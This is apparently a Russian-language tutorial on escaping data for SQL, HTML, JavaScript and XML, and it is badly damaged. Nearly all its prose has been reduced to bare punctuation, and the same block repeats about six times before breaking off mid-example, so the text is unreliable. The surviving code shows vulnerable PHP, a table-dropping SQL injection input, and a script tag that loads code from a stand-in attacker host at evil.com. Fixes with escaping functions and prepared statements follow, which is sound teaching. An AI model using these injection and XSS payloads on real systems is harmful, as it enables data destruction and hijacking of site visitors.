var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
